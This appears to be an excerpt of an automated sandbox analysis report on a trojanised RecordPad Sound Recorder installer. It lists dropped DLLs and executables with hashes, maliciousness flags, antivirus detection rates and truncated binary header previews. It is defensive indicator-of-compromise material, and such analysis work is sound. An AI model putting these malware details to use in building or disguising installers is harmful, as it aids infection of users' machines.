                                                                                    SSDEEP:6144:lieS4N0DdxBa72yNQuqped6c7Bv5ebr+U2pyQqsa3a8g+QTW:UeSyCVaiyNQAd6cV5K+Jp37W
                                                                                    MD5:460B0576549FFD1F55D717BA6E265A05
                                                                                    SHA1:65AB7E2109658102678C122D7DE603E64DCE7CC5
                                                                                    SHA-256:AAB56C21B6CEC7065882A750BECB4526B4CB5815A4AC002C2594F84FB0F5955F
                                                                                    SHA-512:666B16FF72CB847B8D141B0110BBB45AAE67D9BB01E2D6B48C7BDA61C5DC3126CCBC72627C1B93EC23B87E9427C39DC890F1E0A72E5077DC0071E5FEA1B1E3A3
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................7!.....;.....9...............>.;...Vh-.......>.......>.:....=...>.8...Rich....................PE..d.....%Y.........." .........d.......................................................L....`.........................................@........................P...7...l..h!......8.......................................p............ ...............................text...K........................... ..`.rdata....... ......................@..@.data...@....@.......(..............@....pdata...7...P...8...*..............@..@.rsrc................b..............@..@.reloc..8............h..............@..B........................................................................................................................................................................................................................................
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):397672
                                                                                    Entropy (8bit):6.4894894939696846
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:W8c9NNNNNNBgjcQFg7jaV95D3+wxech2KJ:tc9NNNNNN+jcQg7jMnD/xech2o
                                                                                    MD5:B9F3C911728B17FE49BB217D799FCC1A
                                                                                    SHA1:26F4A963E2F43F46323D8610FEC5E8CC8C4A8A16
                                                                                    SHA-256:9CEB41F04B48CF7B419C95D03E227F593836D74A04625C0AD5AD2877D7229B65
                                                                                    SHA-512:0A50270432E6E476D5B4DAF7D9D45053F821BEF02F1872EF598A9E66B2E6B75AE4A89AB97AE175C5143CE3C993D7A354F6389EB5A8BDDBFDE59522103535C403
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........v.{.%.{.%.{.%.*=%.{.%.*?%.{.%.*.%.{.%.*.%.{.%...%.{.%`.+%.{.%.{.%.{.%..<%.{.%.);%.{.%.{w%.{.%..>%.{.%Rich.{.%........................PE..d......].........." .....8..........................................................g,....`.........................................@...87..x...<.... ...........%......h!...........................................k..p............P...............................text...;6.......8.................. ..`.rdata.......P.......<..............@..@.data...............................@....pdata...%.......&..................@..@_RDATA..P/.......0..................@..@.rsrc........ ......................@..@.reloc..............................@..B................................................................................................................................................................................................
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):363880
                                                                                    Entropy (8bit):6.3947346615222305
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:lieS4N0DdxBa72yNQuqped6c7Bv5ebr+U2pyQqsa3a8g+QTW:UeSyCVaiyNQAd6cV5K+Jp37W
                                                                                    MD5:460B0576549FFD1F55D717BA6E265A05
                                                                                    SHA1:65AB7E2109658102678C122D7DE603E64DCE7CC5
                                                                                    SHA-256:AAB56C21B6CEC7065882A750BECB4526B4CB5815A4AC002C2594F84FB0F5955F
                                                                                    SHA-512:666B16FF72CB847B8D141B0110BBB45AAE67D9BB01E2D6B48C7BDA61C5DC3126CCBC72627C1B93EC23B87E9427C39DC890F1E0A72E5077DC0071E5FEA1B1E3A3
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................7!.....;.....9...............>.;...Vh-.......>.......>.:....=...>.8...Rich....................PE..d.....%Y.........." .........d.......................................................L....`.........................................@........................P...7...l..h!......8.......................................p............ ...............................text...K........................... ..`.rdata....... ......................@..@.data...@....@.......(..............@....pdata...7...P...8...*..............@..@.rsrc................b..............@..@.reloc..8............h..............@..B........................................................................................................................................................................................................................................
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):2042352
                                                                                    Entropy (8bit):7.085275197144553
                                                                                    Encrypted:false
                                                                                    SSDEEP:24576:OFZD9URlmDrgBrhEci8XhP3YLd44RS6+FNbqUzUxVvqKGTZnIzudBDFPjQAr10Fu:+ZeLrXFcL0YF7pvtHkfH
                                                                                    MD5:876A839023B8F962A72D295DA7495734
                                                                                    SHA1:62A7728679BC18784B1FBF1D013F7CECE18CBEC9
                                                                                    SHA-256:A757D773DA406411FB977761F6E56F016D48D224AEDAF3D875ED4D4A9EDE6158
                                                                                    SHA-512:E1B23A2F5EC0100FF874CA075BBD0F90E9065A90FEC66861F99DF603D7AAA9DB8E8EC326710FDC11AD41D01BEFE4EA3077136127ACF613614D0D12FF23BEC6C1
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 88%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....^............................4.............@..........................@.......................................................p...3..............X............................................................................................text............................... ..`.rdata..x%.......0..................@..@.data....S.......0..................@....rsrc....@...p...@...@..............@..@.vcp1208............................a.G.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):397672
                                                                                    Entropy (8bit):6.4894894939696846
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:W8c9NNNNNNBgjcQFg7jaV95D3+wxech2KJ:tc9NNNNNN+jcQg7jMnD/xech2o
                                                                                    MD5:B9F3C911728B17FE49BB217D799FCC1A
                                                                                    SHA1:26F4A963E2F43F46323D8610FEC5E8CC8C4A8A16
                                                                                    SHA-256:9CEB41F04B48CF7B419C95D03E227F593836D74A04625C0AD5AD2877D7229B65
                                                                                    SHA-512:0A50270432E6E476D5B4DAF7D9D45053F821BEF02F1872EF598A9E66B2E6B75AE4A89AB97AE175C5143CE3C993D7A354F6389EB5A8BDDBFDE59522103535C403
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........v.{.%.{.%.{.%.*=%.{.%.*?%.{.%.*.%.{.%.*.%.{.%...%.{.%`.+%.{.%.{.%.{.%..<%.{.%.);%.{.%.{w%.{.%..>%.{.%Rich.{.%........................PE..d......].........." .....8..........................................................g,....`.........................................@...87..x...<.... ...........%......h!...........................................k..p............P...............................text...;6.......8.................. ..`.rdata.......P.......<..............@..@.data...............................@....pdata...%.......&..................@..@_RDATA..P/.......0..................@..@.rsrc........ ......................@..@.reloc..............................@..B................................................................................................................................................................................................
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):20840
                                                                                    Entropy (8bit):6.3244920295043645
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:rk3cFbdBtZHvagGFsGfZyGmGovy8ZpHEi+:rk0vHy9oyiRM
                                                                                    MD5:D2BC90D6AF120A0643AD5DC5F3CE8D43
                                                                                    SHA1:419C3246B08125754CCBB4323DD823F8DA0548CB
                                                                                    SHA-256:BDED78571A2E60B3324AB9B4D3DDB6DE12FC08CB4BBE6A582A2C2292AA17CCE6
                                                                                    SHA-512:F34C90E44F473A8CD62B75B6D531FDD47AD132A3F1BCE7AD5C0DDF30C61A2454BA214AA2B6CD50C2A1B6CD3AC85F2D9989775376A400D34EBBD2EFAB0FBECC7A
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ovA{+./(+./(+./("o.(/./(yb.))./(yb*)%./(yb+)#./(yb,)(./(?|.)../(+..(../(.b*)*./(.b/)*./(.b.(*./(.b-)*./(Rich+./(........................PE..d....z{c.........." ......... .......................................................7....`..........................................8..t...T;..x....p.......`.......0..h!......<....1...............................2..8............0..(............................text............................... ..`.rdata.......0......................@..@.data........P.......(..............@....pdata.......`.......*..............@..@.rsrc........p.......,..............@..@.reloc..<...........................@..B........................................................................................................................................................................................................................................
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):660128
                                                                                    Entropy (8bit):6.339798513733826
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:N2fus43uu43Ry4GHlT4xH2K+M+/i+WSpY+7YOzCaK9A3gS2EKZm+GWodEEwnyh:muJzCaK9AB2EKZm+GWodEEwnyh
                                                                                    MD5:46060C35F697281BC5E7337AEE3722B1
                                                                                    SHA1:D0164C041707F297A73ABB9EA854111953E99CF1
                                                                                    SHA-256:2ABF0AAB5A3C5AE9424B64E9D19D9D6D4AEBC67814D7E92E4927B9798FEF2848
                                                                                    SHA-512:2CF2ED4D45C79A6E6CEBFA3D332710A97F5CF0251DC194EEC8C54EA0CB85762FD19822610021CCD6A6904E80AFAE1590A83AF1FA45152F28CA56D862A3473F0A
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........;..h..h..h..[h..h..h..h..Mh..hIAWh..h..Oh..h..qh..h..ph..h..uh..h..Lh..h..Kh..h..Nh..hRich..h................PE..d.....OR.........." .....@...................................................`......a.....`.........................................pU.. ....2..<....@...........G.......>...P.......X..................................p............P...............................text....>.......@.................. ..`.rdata.......P.......D..............@..@.data........P...8...B..............@....pdata...G.......H...z..............@..@.rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):590632
                                                                                    Entropy (8bit):6.463330275333709
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:Mt8MRN4gE4x4iTqwTQa6IUqXF7XyxpypsdUDqNSfbQEKZm+jWodEEV3Ho/:MCMm9pyp35bQEKZm+jWodEExg
                                                                                    MD5:E74CAF5D94AA08D046A44ED6ED84A3C5
                                                                                    SHA1:ED9F696FA0902A7C16B257DA9B22FB605B72B12E
                                                                                    SHA-256:3DEDEF76C87DB736C005D06A8E0D084204B836AF361A6BD2EE4651D9C45675E8
                                                                                    SHA-512:D3128587BC8D62E4D53F8B5F95EB687BC117A6D5678C08DC6B59B72EA9178A7FD6AE8FAA9094D21977C406739D6C38A440134C1C1F6F9A44809E80D162723254
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n...*...*...*.....w.(...#...<...*......./.....".................+.....g.+.....+...Rich*...................PE..d...R8.^.........." .....>..........p"....................................................`A........................................ m..h....G..,...............(;......(A......4.......T...............................0............P......Ti..@....................text....=.......>.................. ..`.rdata.......P.......B..............@..@.data....:...`..."...P..............@....pdata..(;.......<...r..............@..@.didat..h...........................@....rsrc...............................@..@.reloc..4...........................@..B................................................................................................................................................................................................................
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):31528
                                                                                    Entropy (8bit):6.472533190412445
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:R77JqjlI8icUYWhN5tWcS5gWZoMUekWi9pBj0HRN7RA5aWixHRN7osDhzlGs6N+E:R5D8icUlX5YYMLAWRAlypmPB
                                                                                    MD5:7EE2B93A97485E6222C393BFA653926B
                                                                                    SHA1:F4779CBFF235D21C386DA7276021F136CA233320
                                                                                    SHA-256:BD57D8EEF0BC3A757C5CE5F486A547C79E12482AC8E694C47A6AB794AA745F1F
                                                                                    SHA-512:4A4A3F56674B54683C88BD696AB5D02750E9A61F3089274FAA25E16A858805958E8BE1C391A257E73D889B1EEA30C173D0296509221D68A492A488D725C2B101
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U..\4~.\4~.\4~...^4~.UL..X4~.Dz.[4~.D}.^4~.\4..v4~.D..Y4~.D{.O4~.D~.]4~.D..]4~.D|.]4~.Rich\4~.........PE..d...W8.^.........." .........$............................................................`A.........................................>..L....?..x....p.......`..4....:..(A......p...@3..T............................3..0............0..0............................text...(........................... ..`.rdata.......0......................@..@.data........P.......,..............@....pdata..4....`.......0..............@..@.rsrc........p.......4..............@..@.reloc..p............8..............@..B................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):963232
                                                                                    Entropy (8bit):6.634408584960502
                                                                                    Encrypted:false
                                                                                    SSDEEP:24576:FkZ+EUPoH5KTcAxt/qvRQdxQxO61kCS9mmWymzVPD:FkMAlM8ixQI5C6wl
                                                                                    MD5:9C861C079DD81762B6C54E37597B7712
                                                                                    SHA1:62CB65A1D79E2C5ADA0C7BFC04C18693567C90D0
                                                                                    SHA-256:AD32240BB1DE55C3F5FCAC8789F583A17057F9D14914C538C2A7A5AD346B341C
                                                                                    SHA-512:3AA770D6FBA8590FDCF5D263CB2B3D2FAE859E29D31AD482FBFBD700BCD602A013AC2568475999EF9FB06AE666D203D97F42181EC7344CBA023A8534FB13ACB7
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Ck.."..".."..D...".."..-"...s..$ ...s.."...s.."...s.. "...s.."...s.."...s.."..Rich."..........................PE..d.....OR.........." .....h...:.......)..............................................].....`.................................................@...(............@...s...t...>......8...p................................2..p............................................text....g.......h.................. ..`.rdata...8.......:...l..............@..@.data...hu.......D..................@....pdata...s...@...t..................@..@.rsrc................^..............@..@.reloc..8............b..............@..B........................................................................................................................................................................................................................................................
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):869224
                                                                                    Entropy (8bit):6.632387605957213
                                                                                    Encrypted:false
                                                                                    SSDEEP:24576:DJf34ppw4hjg401r+iTy2mmzuF3SJciti0ZIj8UoJwCR:Dl3ypw4yN/RiF3SJdO8xJv
                                                                                    MD5:DAA904CE63B0A290111AED5E843B9368
                                                                                    SHA1:6642AD5C2622D756EB3500E7C0420E9DA7A16BB1
                                                                                    SHA-256:471BBC3FA0A98869F6791E0D1A55B38F5E360842A7CC219A6FF26030E62DBB1B
                                                                                    SHA-512:CBFD06523F1855AAF4BE2D33EB3A3A324C8D7AF4871B314AC2C165FD17F8DA6CD2F465E9405412282AAC1ED247B811A4A73D91069A324A5AEC531253AE3A4D0B
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t.9d0.W70.W70.W7...73.W70.V7m.W7.M.71.W7v..7..W7v..7..W7v..7$.W7.s.7e.W70.W7'.W7.s.71.W7=..71.W7.s.71.W7Rich0.W7........PE..d......].........." .....8...........\...............................................$....`.................................................|...(....`..........x]..."..h!...p.......R..8...............................p............P..H............................text...7+.......,.................. ..`.rodata......@.......0.............. ..`.rdata..FP...P...R...<..............@..@.data... K.......&..................@....pdata..x].......^..................@..@.rsrc........`......................@..@.reloc.......p......................@..B................................................................................................................................................................................................................
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:ASCII text
                                                                                    Category:dropped
                                                                                    Size (bytes):1297
                                                                                    Entropy (8bit):5.115489615345492
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:CbUneZXof9+bOOrXqFT09+JYrXqFTzl796432s4EOkUs8QROJ32s3yxsITf+3t1e:Cn3OOrXqJ07rXqJzr6432sv832s3EsI/
                                                                                    MD5:AAF4009F5963B1B270D8C3E697EBE442
                                                                                    SHA1:F5A44235094DA0B8B5992C6112CB8C356EF22B93
                                                                                    SHA-256:3988CDCCB878675B4AB8C11F21EF7F6301451F59E2E2BF3F07E963D36C8E9767
                                                                                    SHA-512:BC30F4C5F17E4F0CDE2CDD5C36A6EC28271569E18808E736186D42409564E3E6FFA8AD23842912C90F39CE6264A698714A434092778C74CBDE6C330DD3969109
                                                                                    Malicious:false
                                                                                    Preview:Copyright (c) 2013, Cisco Systems.All rights reserved...Redistribution and use in source and binary forms, with or without modification,.are permitted provided that the following conditions are met:..* Redistributions of source code must retain the above copyright notice, this. list of conditions and the following disclaimer...* Redistributions in binary form must reproduce the above copyright notice, this. list of conditions and the following disclaimer in the documentation and/or. other materials provided with the distribution...THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND.ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED.WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE.DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR.ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES.(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERV
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):51
                                                                                    Entropy (8bit):3.48286657951254
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:cUoytoUD6MBomFUT:cUoQoUD6Qoyy
                                                                                    MD5:034D89CD2C41EDFCEADA9F96A3C0A56A
                                                                                    SHA1:92AB4E6FF98CA987D56EA3C1BA36D1C61EF23ACB
                                                                                    SHA-256:44BBE94D481B106F00223DD406D015AEFD00CFA2DBA9428BEFC2B8F6A3FEB971
                                                                                    SHA-512:6C3E701D2D0FD24FDB46C0E1B0EF5245F36E4A34A9D2340665A31F6331C2D6F08680399600FB02C3D51694F9BAFFB3E41A367CB4FE945D4836B669DA63EB6358
                                                                                    Malicious:false
                                                                                    Preview:1 1..4 3..3 2..16 9..6 5..468 60..728 90..2592 1936
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Category:modified
                                                                                    Size (bytes):2963553
                                                                                    Entropy (8bit):6.7944113831776685
                                                                                    Encrypted:false
                                                                                    SSDEEP:49152:v5F8VSyAJvaA5z8wbu33Lti5WGzndHKX5HCn:v5F8bAJyez8P33LtiEGzndHKX5w
                                                                                    MD5:1F7ED6F21708581170C4BF77C64A9D32
                                                                                    SHA1:B954FBF7C8A8523B7F2C101E6A7B1D852D1DBF7C
                                                                                    SHA-256:180FCC0CB50242D15ECF0DDD438C14E04A6A7B464BF0636E79620DB497A08DF7
                                                                                    SHA-512:2F62E6B4668E122C5768438E96062DFEE16E13829967F592C92DF93240908B4A09C84BBF96B6F5FBBEC2445E13FE828A0149887673A2C66E4812D0184FB9E28B
                                                                                    Malicious:true
                                                                                    Yara Hits:
                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe, Author: Joe Security
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 42%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......^..........&...............................@..........................`-.........................................................@............................................................................................................text............................... ..`.bhead8.n*.......0..................@..@.data...xT...0...@...0..............@....rsrc................p..............@..@.chead8.........a...................a.f.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:InnoSetup Log RecordPad Sound Recorder, version 0x30, 5453 bytes, 123716\user, "C:\Users\user\AppData\Local\RecordPad Sound Recorder"
                                                                                    Category:dropped
                                                                                    Size (bytes):5453
                                                                                    Entropy (8bit):4.791987156187057
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:aH2HoJUdWL4888pgU+95+eOIhfhlEo4cVSQs0LML4gJywwQwbOw6wcnCRS6pc2Bz:aH2HoJUdWL48XpgsHIhfjEdcVSQ1ML4n
                                                                                    MD5:05CFC207A915D3BEFB9E2FFD5BC70259
                                                                                    SHA1:DB6F6599D41B619419A9EE17A80CF419E162607C
                                                                                    SHA-256:6C304B48096E49444AE1A2E09A3598577460388492E19B38E83A142F2D1DBEA7
                                                                                    SHA-512:9321DABC2CD59A6A7397B22AF232DB033DB2E0D46F7C0FBF4EF07166EF004DFF7CEBB7D0E6C4A18161C77C00BB7B7C220726D83B1873794A4DC051A6890ADB44
                                                                                    Malicious:false
                                                                                    Preview:Inno Setup Uninstall Log (b)....................................RecordPad Sound Recorder........................................................................................................RecordPad Sound Recorder........................................................................................................0.......M...%.................................................................................................................S........../........W....123716.user6C:\Users\user\AppData\Local\RecordPad Sound Recorder...........).6.... .....Q......IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...........................................!MAIN....-1..(...dll:kernel32.dll.CreateFileA..............$...dll:kernel32.dll.WriteFile............"...dll:kernel32.dll.CloseHandle........"...dll:kernel32.dll.ExitProcess........%...dll
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):707354
                                                                                    Entropy (8bit):6.470926417661749
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:D0QfKb7nH5lrPo37AzHTA63I0ihE4UEQrrNtIECORGv95ELAfXExy8z:nfKbT5lrPo37AzHTA63/cfU9IEU953fo
                                                                                    MD5:F2E1861AB7EFD6358283CF101045A727
                                                                                    SHA1:15F34DC254FE02A84F2F8AD4D5495D7E799F2F9B
                                                                                    SHA-256:35A50C7721675C5422D5F7979912FB1B2BE5811CBBAFBA60FEA36D2DBBC87190
                                                                                    SHA-512:C92F41CEFDEC7305C526F5903509760512F9DC152AFC2969F40B40ACABDAD41CF40273BAC8CEECBA47C4BC0DACDA14D0DA74B8312AFFF37CFADBD8EF8933C685
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                    Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................&...........1.......@....@..............................................@...............................%...`...>..........................................................................................................CODE.....$.......&.................. ..`DATA....<....@.......*..............@...BSS..........`.......<...................idata...%.......&...<..............@....tls.................b...................rdata...............b..............@..P.reloc..............................@..P.rsrc....>...`...>...d..............@..P.....................*..............@..P........................................................................................................................................
                                                                                    Process:C:\Users\user\Desktop\tOniaJ21lj.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):696832
                                                                                    Entropy (8bit):6.462782329218102
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:L0QfKb7nH5lrPo37AzHTA63I0ihE4UEQrrNtIECORGv95ELAfXExy8:ffKbT5lrPo37AzHTA63/cfU9IEU953f0
                                                                                    MD5:8EF7001015E126E74BC41268504CA1E2
                                                                                    SHA1:B30C0FA54ECB63C735407144A3297E0B9D881E27
                                                                                    SHA-256:E06E234073AE4A9DF232AA1D535F02429A371748E164606C1B1A4C74BD98C56C
                                                                                    SHA-512:122DF0A13F2D0C3103F0F686863CFAB46114A417C5D6A4382410C2CCF0AA3E9859D8E760B5C1860C776B1064F5BCCBF1E8AA50108F948F9240A5DD80D31CF17B
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                    Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................&...........1.......@....@..............................................@...............................%...`...>..........................................................................................................CODE.....$.......&.................. ..`DATA....<....@.......*..............@...BSS..........`.......<...................idata...%.......&...<..............@....tls.................b...................rdata...............b..............@..P.reloc..............................@..P.rsrc....>...`...>...d..............@..P.....................*..............@..P........................................................................................................................................
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):4096
                                                                                    Entropy (8bit):4.026670007889822
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:ivuz1hEU3FR/pmqBl8/QMCBaquEMx5BC+SS4k+bkguj0KHc:bz1eEFNcqBC/Qrex5iSKDkc
                                                                                    MD5:0EE914C6F0BB93996C75941E1AD629C6
                                                                                    SHA1:12E2CB05506EE3E82046C41510F39A258A5E5549
                                                                                    SHA-256:4DC09BAC0613590F1FAC8771D18AF5BE25A1E1CB8FDBF4031AA364F3057E74A2
                                                                                    SHA-512:A899519E78125C69DC40F7E371310516CF8FAA69E3B3FF747E0DDF461F34E50A9FF331AB53B4D07BB45465039E8EBA2EE4684B3EE56987977AE8C7721751F5F9
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................H................|.......|.......|......Rich............PE..L....M;J..................................... ....@..........................@..............................................l ..P....0..@............................................................................ ..D............................text............................... ..`.rdata....... ......................@..@.rsrc...@....0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):2560
                                                                                    Entropy (8bit):2.8818118453929262
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
                                                                                    MD5:A69559718AB506675E907FE49DEB71E9
                                                                                    SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
                                                                                    SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
                                                                                    SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):6144
                                                                                    Entropy (8bit):4.215994423157539
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12pS5SKvkc:sfJEVYlvxaX12EF
                                                                                    MD5:4FF75F505FDDCC6A9AE62216446205D9
                                                                                    SHA1:EFE32D504CE72F32E92DCF01AA2752B04D81A342
                                                                                    SHA-256:A4C86FC4836AC728D7BD96E7915090FD59521A9E74F1D06EF8E5A47C8695FD81
                                                                                    SHA-512:BA0469851438212D19906D6DA8C4AE95FF1C0711A095D9F21F13530A6B8B21C3ACBB0FF55EDB8A35B41C1A9A342F5D3421C00BA395BC13BB1EF5902B979CE824
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
